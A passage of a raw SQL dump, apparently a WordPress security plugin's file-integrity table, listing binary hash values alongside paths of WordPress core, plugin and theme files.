{�v��c�0~��H���','',0,'?'),('&�vA��Q��c��qw8,','wp-includes/theme-compat/header-embed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Omz8��F����','�����})d!q ,@,��j��v ����E���','',0,'?'),('&饱����W���|�','wp-includes/widgets/class-wp-widget-links.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x�/k�h\n��ֽ[Nv ','�쇉���,�x���-��DO�,��7ш�Q�','',0,'?'),('&�Y���z�q�[F�f@�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/WebService/Client.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ⶨ�;*���?��z�','���:O.�\'�~y��@�Y`FMN�:�n�.�;q@','',0,'?'),('&���PV�w��Ss','wp-content/plugins/wp-cerber/cerber-2fa.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\nqd��Ը��}��','��\Z�����h��=RG��0��%̪��� �Mm6','',0,'?'),('&�aUG���κG��','wp-content/themes/twentytwentyone/assets/sass/05-blocks/quote/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���!!o=b��i','k�����{��G9��W1h��`���sҗ�D`�M�','',0,'?'),('\'=!Za��a���jU�Q','wp-admin/css/site-icon.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���}�E���p0lu','i>Ӻ#�&�2Z�\'��K(*�����','',0,'?'),('\'Ac���, ~�6�ܦ�','wp-content/plugins/wordfence/views/onboarding/tour-overlay.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:��%� �);�\0','\Z��\'ġ맪���.s\'��sd�4�^��I','',0,'?'),('\'I+��zzY�m}��L','wp-content/themes/weblog/assets/library/owl-carousel/owl.carousel.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��lb�[�D(.��B�bY','^S����B�ŅZ�C8�\\s�P��c7M��[\n','',0,'?'),('\'M��w����\rKj','wp-admin/includes/class-wp-site-icon.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W~��0�d���y�','_9��%7�N�[\"��m�;Xi:RG�x^�q]','',0,'?'),('\'Q�K�[xf�|��*�','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/customizer/controls/class-epsilon-control-repeater.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���S�ey2 ���\\','��h_��뼻|0�-��G��hx�Q�(�)','',0,'?'),('\'q�� ��e�����c','wp-content/plugins/wp-cerber/assets/tpicker/jquery.timepicker.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��oD�Z3���nR��w','�c�4r)|��V��_kZ�n��:\"���Q%��','',0,'?'),('\'���� �o���S��','wp-content/plugins/wordfence/images/icons/ajax3.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mw�ߴtꍓ\'\n���s','�dz��\n�yK�Ʈ��\'#]�x VJR��.=:','',0,'?'),('\'�` k��fS]��','wp-content/themes/doctors/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z�/\\k����|.>','\Z�I�4�q�4/�v��w����<�C�$��h�','',0,'?'),('\'�\"z��n��p��aE','wp-content/plugins/akismet/views/enter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�EG�T��A>�sJ','F���R�<`�=#i�z�Ag�Dd)��q','',0,'?'),('\'�s�kV~�#���X','wp-content/themes/advance/inc/kirki/assets/js/controls/typography.js',0,'N���� c[/��/n','N���� c[/��/n','�����z��4Y����L\Ze�^�@�(��','',0,'?'),('\'���q#�]#X��q','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-repeater-control.php',0,'��F�6�!�z��R','��F�6�!�z��R','>߃$3���*��>$ֻ-t�����,���','',0,'?'),('\'�g|\"���jݹ2�','wp-includes/js/jquery/ui/effect-transfer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','OԩN��i���1','Ł\0p�,�\\�!ON)�Q���Xl ��k�s�l�','',0,'?'),('\'�Z?��X��W�<�','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-image.php',0,'�a͐��\r����','�a͐��\r����','u�^K���\n���ih��C�d.i�H�-��j�l�','',0,'?'),('\'�DvWRc��L�ec','wp-content/themes/healthcare/css/font-awesome/scss/_larger.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y1VooƭV����','�0*?�TW�釧�3�s�<��K@����*Q','',0,'?'),('\'��(����7�c��','wp-content/themes/doctors/images/demo/slider_3.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\"!���\Z�^��','���( OL��j�t�ǯb��^z���)q�','',0,'?'),('\'����t\\JZ�Ah�','wp-content/plugins/wp-cerber/assets/flags/se.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5r5�E&a��_�&� ','Wh�LP!����#O�QkJ�Nj�9u`$�c��','',0,'?'),('\'���_iYm1��R','wp-content/plugins/wordfence/views/scanner/scan-results.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r��Z�}giؑz2*P','��wu�p -���D����<z�w榀UD4�Ԥ','',0,'?'),('\'��=�-���AC\\K','wp-content/themes/twentytwentyone/assets/sass/07-utilities/color-palette.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e�s�Aq��tf>�\Z9','k�:����4�j�(��$����緪��c���','',0,'?'),('\'�t\r�9��QGb/���','wp-content/themes/doctors/app/assets/css/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���n�`��fe����a','�7,V$�gŠ2�����a���06��m>�c','',0,'?'),('\'�,��r\n\n\r\Z�3�','wp-content/plugins/wp-cerber/assets/flags/mc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3\"0\r�2O�>�=D1�\0','�0�0V�>�K[�5_��R~�dy�� \ns��S��','',0,'?'),('\'��}ퟱ �2�\Z:�8','wp-content/themes/regina-lite/layout/js/preloader.min.js.map',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\rCt���|\0�8�W','ѷ\0]X�o9�BY��4�zVpί!��?���','',0,'?'),('(��g%\0��4��l>��','wp-includes/js/jquery/jquery.schedule.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&��T�k�f؞���','��?��vEʔ��wj���C�P՝��_��','',0,'?'),('()���A��G���T�w','wp-content/plugins/redirection/redirection.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7�?j����7sz�u','g�o0�}���~m\\U��ͭ=��o���sI����','',0,'?'),('(+�lr�Y����cm���','wp-content/themes/healthcare/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���{�6��+_�Q�','�m�+5sr[������0~�OU|��\Z�2O7í','',0,'?'),('(?���>��S�N揚�&','wp-includes/images/media/default.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-����I�B�h�@���b',':�oL�JDj�$->�i��\'�6n֠��Ui','',0,'?'),('(WQ=3��y��b6','wp-includes/cache-compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?�Iq_��P�$ӄ','���]4\'��9���w�E��J�J�\r�nh�','',0,'?'),('([d��������BQ��','wp-admin/js/updates.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K��5�yP��Õ�{','��NI7`&\'�8�Zt���U�-��*��n�/Y','',0,'?'),('(x*J���,�LÛn�<K','wp-content/plugins/wordfence/images/icons/arrow_refresh.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k�w�`�`�|�}$G��','u�/2/����@�H�_Ilh����/�aU:� ','',0,'?'),('(~6vqV�0�{�\"','wp-includes/ID3/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ݣ��z�eѧѥk58�','l��r����p4��FBܢ7\"Z:�W�v���','',0,'?'),('(���v|T�— ¥�','wp-admin/includes/screen.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ɬV\Z j���A��|�','~Ky�i�2j*SgT<�q{�aa�%���;���;�','',0,'?'),('(���y\0 �pDO�`','wp-content/themes/twentynineteen/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*����\0���a��6R','��:�g����~{l���E�8��1XT`CYH','',0,'?'),('(��C\n֊��bAk6FS','wp-content/plugins/wp-cerber/assets/sh/scripts/shCore.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H���l7�B����20O','%{��*ZO5��D�\n�¦+�1T�c���#`','',0,'?'),('(�Y�\'��^kz!q����','wp-includes/js/dist/block-directory.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*U���ܰ��(���','��5�~�Y*�2M���3zf�f%���w�L�qՇ�','',0,'?'),('(�Y��)�I��b/!','wp-content/themes/doctors/core/customizer/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V��:.�X���\Z�','<\n�I?���~�Щ0�2e�Q>�\\��j(?\"�','',0,'?'),('(��Օ�)�(pwBl','wp-includes/js/dist/list-reusable-blocks.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^��\'}�w����0b','��\\o�U0.RoIOqe?�~�`ٰ�E�i�.','',0,'?'),('(�|�Z�x�T���[�u','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Base64/Original.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z?��(��E�Wup�','�+���D�\0ej�\rg���ϧ��4�','',0,'?'),('(���>f0\Zg[|���','wp-content/plugins/wordfence/lib/wfJWT.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}{ j�N���c�K�','0mhN`x�x~H�Lj�s����O��P��,','',0,'?'),('(��LS[��Wl#���','wp-includes/sodium_compat/src/Core32/Int64.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%m�S�,���\\�','U���!�6��/�U�cq���n���@�+�','',0,'?'),('(�^�3N������3','wp-includes/wp-diff.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ��-x�<�z^�Wet','�a��;�ɺ��*2Z��f1��\"�\n�Nt~�>��','',0,'?'),('(�=��,��*F\n�^Jv','wp-content/plugins/wp-cerber/assets/flags/eh.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<���n���7W6^\Z','��I�auK�+��<?�`]�n]�m|�P�ّS','',0,'?'),(')���|�{4�+]�X(','wp-includes/Requests/Exception/HTTP/411.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'�R��M�.�Z`G�','���U�^����9p��&���`�nM{� n�L','',0,'?'),(')��` ^�b��̵��','wp-content/themes/healthcare/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mPL~��u��{�L\r!M','�k=������Z�Nr�*�Zi|��V�@','',0,'?'),(')P�ʖ����u�','wp-content/themes/doctors/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�D�ßb_�џG ^��','�Hs[l�q �5\r(�@��/�<8�mu���','',0,'?'),(')ow�+|��$�\08Y','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/css/scss/controls/upsell.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\0ߔl�0;-��_%�','��#�h�F���f9�/���z��w\"��\"Vf�','',0,'?'),('){�jW-_�Q=?�GlҢ','wp-includes/media.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D��|��ߟa]IW�S�J','R�y��n�lq��侅��.�$�����%','',0,'?'),(')�Oz=�u����˷','wp-includes/rewrite.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7\0B6\"���7��X�','�\n����בu��������5$E��i�4I�d','',0,'?'),(')̃�2�k�h���! ','wp-content/plugins/akismet/akismet.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h�͢<�5����Q�','$}�\\��g��\0e�:�n�f�E}ۜ\r��I ','',0,'?'),(')�6#�_��̟SAF�','wp-content/plugins/wordfence/views/scanner/issue-control-repair.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a!�[)T.�nk=ݗ��','�tl���J%�0wdE��\"�4.t�kL��9�1��','',0,'?'),(')��]���Z$�P%','wp-includes/embed-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��U�z�A>z�\'!f*','*xJ���\"�t��\r^K$U�09���Z�иC�ru','',0,'?'),(')�I�\nΆV���q��{','wp-admin/authorize-application.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��xO����$:��g-','M����J,�l��zEX�N>�����T��','',0,'?'),(')�`��f,��u�4��','wp-admin/includes/class-wp-privacy-data-removal-requests-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�X� D2%l#b/�W','ջ�R�\0���\0�����i�H//���w��\0�','',0,'?'),('* a�F���4��u�vU','wp-admin/images/menu-vs-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�ZY<�i�Y��b�','\'��F�єE\0����7�ɡ��#�>sePض','',0,'?'),('*#a\n�gE�\rK�㆓w�','wp-content/themes/skt-toothy/css/style_base.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Yh��ܯW�Yʣ��@�','�-�8�\Z.���jW��[l*;���w�����','',0,'?'),('*3G����ү�$�I','wp-content/plugins/wp-cerber/cerber-load.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������u1��; !ɥ�','|���\Z^}=ρ�>�m̎7i���A���@�C&','',0,'?'),('*:փ�睮wtRe�f','wp-content/themes/healing-touch/images/hr_footer.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]P`_�v�����8#7','�?i*�g�\'���=[c|��`zi�c�e�;�YQ�','',0,'?'),('*A��Et�E�����','wp-content/themes/healthcare/images/slider/slider1.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7@�u<M�\'���','��WG��Ujw��I+� ���guQ��9���','',0,'?'),('*D���4w����m�Z','wp-content/themes/advance/comments.php',0,'�[R��n;�|S]�W�7�','�[R��n;�|S]�W�7�','�\'�u7�KQ��`w��\n�=��5��Pfe���I','',0,'?'),('*V.XZ��_C[AԀ�C3','wp-includes/js/dist/keycodes.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','aY�=�Q\n�x��,��','���Gֻ�S�����7�֕�g]Y��P�','',0,'?'),('*\\Tҝ)%]�yiD+','wp-includes/Requests/Exception/HTTP/402.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`�Y�QP�\nz����G�','�g��NQ �������/��� �y5������θc','',0,'?'),('*jn\\�H��\0�U��+','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/js/epsilon-previewer.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=)�FN�DQ�}A','q}�w2U3�,U����::�͞�Z��Z�ݬS5','',0,'?'),('*lK��qW�M\0| ��Y','wp-content/themes/twentytwenty/assets/images/2020-three-quarters-1.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-��a�.�t�]U��v�','n��\0��<VEկ�Rm�K�r72k�kSe�\'��#','',0,'?'),('*�8g]�no�r�Z�5','wp-content/themes/healing-touch/inc/jetpack.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(�Ɋ�&$����}�','����$\nK�b[�M\Z�>�~U\n�1B9�\r�5�\0','',0,'?'),('*��-3�u��E�[�O#','wp-includes/images/down_arrow-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]����M�����f�','��w\0����qp�q�5���T�#�\\����','',0,'?'),('*������b��*ee�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/HSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x\\8z�M�~�.��','�vR�\0�S~[�\r��Ү6��o���:Ś�\r]','',0,'?'),('*˱uuV@l 0�Mj','wp-content/themes/regina-lite/inc/customizer/panels/testimonials.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-�B\Z�\0�yh#{K�','��\Z���w�-���\\1�P�Ϫ�)�p��k2�X_','',0,'?'),('*��L�m&&2��\nb','wp-includes/js/tinymce/utils/form_utils.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���l�U��T����Li','vL���us<*r�WҪ����.\0|�Rg����','',0,'?'),('*�`U�z�]\"L%�1��','wp-includes/sodium_compat/src/Core32/HSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��/Dzx��ǂ��','���,�����E���{��0/m�a�X�i���','',0,'?'),('*�mB��vH\ne��','wp-content/themes/twentytwentyone/assets/sass/05-blocks/utilities/_font-sizes.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f�����MiGx��V�s','i��Y4t��4|-�>1�]�f�)J����I�Z��l','',0,'?'),('*�&C:[���r�9�N�','wp-includes/sodium_compat/src/Core/Base64/Common.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P��ef���i�\'�jW','6���UmЖ�%��?�M�S�A^=�X��|U��','',0,'?'),('*�\Z07ѥ1O���َ8','wp-includes/js/json2.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s��{N�|EO�0�','q3�..�j G\\R�nݼI/T��-�','',0,'?'),('*� �ą����\\�','wp-content/plugins/wordfence/views/options/option-toggled.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`GN��M��ti����','�r��_4\0��2��:䮰�!p1A��c_','',0,'?'),('+ �H��b�m���','wp-content/themes/doctors/core/contents/part_header/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','갛\\+m�\r 6��','�J��6��M������+k����B�\nW1','',0,'?'),('+&|1�� �w6�b��*','wp-content/plugins/wp-cerber/assets/flags/vu.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&�@�C.�J���#','��;����\0ě�k��=���G���W$��۳','',0,'?'),('+9���[BU�E�e','wp-admin/js/updates.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r��Y��=��{��','�z#s�Tc o%*��l1�qܩ�d�I�G��','',0,'?'),('+N�H��l}¸�t��+','wp-content/plugins/redirection/locale/redirection-de_DE.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tw7}9N�rm��f,','o�m��ɐ��|��t��`=�7���h,��','',0,'?'),('+b\n��Df�X2���Y�C','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/ConnectionType.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d���S:�-N�!Q�0\"','�6�)?��^\"F�*�g|��&��R�Π��\0 ','',0,'?'),('+c߂;l8�|Kb�\0�S','wp-content/themes/doctors/attachment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��4�_���E�3)',',�Vi05�J�+݉��\"��_�m�Ec��p�V','',0,'?'),('+lH�m�ӿn�Q���','wp-content/plugins/wp-cerber/assets/flags/ae.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��*� �X4^���','ظ�,&9uO�)S�ղ�?(2��ᖘ��Lq9�,�','',0,'?'),('+��G*#���f�','wp-admin/network/site-info.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��;�Z�����x���d','�&9�+��\\\0��� ҄&1ܪCj��ڠ�Z','',0,'?'),('+�\ZD���Ze}��','wp-content/plugins/wordfence/views/onboarding/plugin-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`�K����Ʈ�;','2�<������A$2�V���e>G�3�7�\Z�','',0,'?'),('+��t�%R?������','wp-admin/network/credits.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B�+���KVe�=�','WN��h�K2Z�F��W���\r08���J5','',0,'?'),('+̷�Y���p��$$�,_','wp-content/plugins/redirection/redirection-admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��j\"э�����','��&oV?�i\Z�݀N��C�@*{��RΒr�','',0,'?'),('+�-�re�=XZr�yg','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-user-login-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|T��}<o��d���','��K��-��9-���k�#�Ƙ��&PwY�','',0,'?'),(',\0��=�^(l�X$��=�','wp-content/themes/weblog/acmethemes/customizer/feature-section/feature-panel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S������h��jϖT$','�*�gd�H���AB�+Di�������5^�','',0,'?'),(',��Je����;�','wp-content/plugins/wp-cerber/assets/flags/sv.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G�Z�k�}Ϸ ��>','?Ύ�~-y�Ph#sbP���\Z��=��1�tՈY','',0,'?'),(',�\Z�J\'�AWh��','wp-content/plugins/wordfence/views/options/option-label.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���`�L��gf�','��_�\r\0�����\0�Z}��})v[4�������','',0,'?'),(',<�� �?C]�0A�','wp-includes/js/tinymce/plugins/colorpicker/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ͷ���U裦�h�','��ehӧ�&έ��A�3�+WTh��\n\Z)�?��','',0,'?'),(',]\'N�%ݑUeT���)','wp-includes/js/dist/annotations.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��T[qx/�^�`P����','��7��[PS�%�\r����)/Qe�X�|ۺ4�','',0,'?'),(',a�(�f��>��k��','wp-content/plugins/wp-cerber/assets/flags/dj.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�2�cV�>�!�>�','��A|�L���0��ܷ��H��̠���Y���','',0,'?'),(',z�e��Y#uJ~[P\r','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' OpR{�ҵ��Gݍ�','�Y��:B���P5M��s_�����.ن�֎�','',0,'?'),(',��K��%���_��7','wp-content/themes/twentytwenty/assets/images/2020-three-quarters-3.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �*9-H�f҅ �X','�ۼ=�w��{���v�^Ƚ���C�qF:@�','',0,'?'),(',���@��hj�qrޒ�','wp-includes/ID3/module.tag.id3v2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o�d�4��y�N�4','aƙ�4>$�z���%�5��z ����9��_','',0,'?'),(',�hɃs?4B[�^՝','wp-includes/SimplePie/Cache/DB.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w���M�\rʍ�|D�','g#�����]\"�h0Vq�)�0��j�%���I�','',0,'?'),(',�x\Zpp������L��','wp-content/plugins/wp-cerber/assets/flags/at.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v$<��dkmy\\g�','g߇���;o*���^�U㋥GjJ��>�ED\\�%','',0,'?'),(',�M�&���K�f~��hK','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-user-login.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2�g2�.qExJ�H&','�RhZ^�g�<��F���~�F�H�Y��C07','',0,'?'),(',�%�����AH�@�g�a','wp-content/themes/healing-touch/images/favicon.ico',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g��\0�~V�,O�Fx','@��@�����N��kl>]���^~Y���','',0,'?'),(',�������lS���r','wp-includes/css/dist/editor/editor-styles-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?4��nT�#���','�D�ծ6��8g\n)e���z��l�1�MH��&','',0,'?'),(',愵�X�ա�y%�!�o','wp-content/plugins/wp-cerber/assets/flags/iq.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��(��C!���>�hF','�����=zZ!��i��74\'�j\"DC���͎(','',0,'?'),('-��aT�ޱXJϓ��','wp-content/themes/twentytwentyone/assets/sass/05-blocks/verse/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���M@-~��V���rq<','B�U��\n^E��������FE�י�慎q�d','',0,'?'),('->���\"x �I��','wp-content/themes/twentytwentyone/assets/js/editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~K�a��OV��E��','��wr^V[������H\"��|�iAu�h,�','',0,'?'),('--�ü��$�);��J5','wp-includes/js/dist/rich-text.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y�����Lc#Ul6��E','C��7�CG��,A�b�c�j*�jF�i�!��c!V','',0,'?'),('-S@�����p��[e�','wp-content/themes/healing-touch/front-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\Z\Z0�[entnBR','|���Jg���+q%\"8t�c�\'���!-��','',0,'?'),('-\\��[�����J�ץ','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20/Ctx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F�1��� �M����]�','��A8��{�!��V�t<S��qH�oh�4��y`By�','',0,'?'),('-jާ� �����~hyb','wp-content/plugins/wordfence/lib/menu_support.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c�-ce$���','��\"\n�|�\'iJ���O��u;�DU���8','',0,'?'),('-kdϯ���X�w\\7���','wp-includes/admin-bar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Y��\'[+�\"�c�W','J�����xb��ADHM����2������6�M�','',0,'?'),('-w�T��r�Y��90�y`','wp-content/plugins/wp-cerber/cerber-request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�xf�ڒ�k�Di��','�� f����7�6��\"������`)���','',0,'?'),('-����Ǹ�%w=��','wp-admin/css/colors/ocean/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�������V�*,^b*$�','nh�ᷘvU�?D��4��w�Zq������w_','',0,'?'),('-��w�3�(\"O5kds�','wp-content/plugins/redirection/README.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','--�\"7��2�ZZ','+�z2&��?Ev1R\n�yʊ��\Z��','',0,'?'),('-��w\n����ȌT���\'','wp-content/themes/doctors/core/includes/dynamic.js.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ƀ\nܱ�9mEΑ�0��','��hp�z�MٸxM��2�h]QxuZ�T��_@]','',0,'?'),('-���_���mq+��1�','wp-content/plugins/wordfence/modules/login-security/classes/model/settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h㠲���i�e��ɡ','IH�Mp\\��N�h\nN��F=-���Z�=hO','',0,'?'),('-��)7�5y�8c��Wv�','wp-admin/about.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�̖��Tz�<��s*�',',�!�G�1�g�?�GQr�������b^�~','',0,'?'),('-�_��+��Yn��S','wp-includes/js/jquery/ui/tooltip.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a�\r��c5V����h','+*5�~oѼ�>�\\Z������c���l�','',0,'?'),('-�f��4]�#\"u��l','wp-admin/css/colors/light/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�Y�%��u#+�eR:?','8�;\0�0�p�7L��2ү���r@��n�','',0,'?'),('-��[pp��q\0jm','wp-content/themes/weblog/template-parts/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9V�Z�m�@u@���','F�u<�\r���$t�me����)�0a�A 6^','',0,'?'),('-���{�\nwQ���^g','wp-content/themes/twentytwentyone/assets/sass/05-blocks/blocks.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o�}Z/���X[�{6��','p���W�� ��/������\r��%\Z��`','',0,'?'),('-��藂��Y{]ns�','wp-includes/css/wp-pointer.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�U�Y�D�K�z�c','>�;��]ۼH�Ֆ&�ݟ�������`;�','',0,'?'),('-�ܰ�A%|�/G0','wp-content/themes/healthcare/lang/en_IN.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<Q\\�{�\nE\'\"!','&��V�P�y�����v��ep�J�=��oTc�','',0,'?'),('-�d�L�ƥXH�m�','wp-content/themes/twentytwentyone/assets/js/editor-dark-mode-support.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ap!}��7�Wsj�','j�����=Xi_����ְނpߤ��^Ѯ��','',0,'?'),('-��ǁ!$�͒s��','wp-content/themes/healing-touch/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�_��R��P~R�\'Vt','�0wr(�$Sjъ����)��u��pj���Oӎ 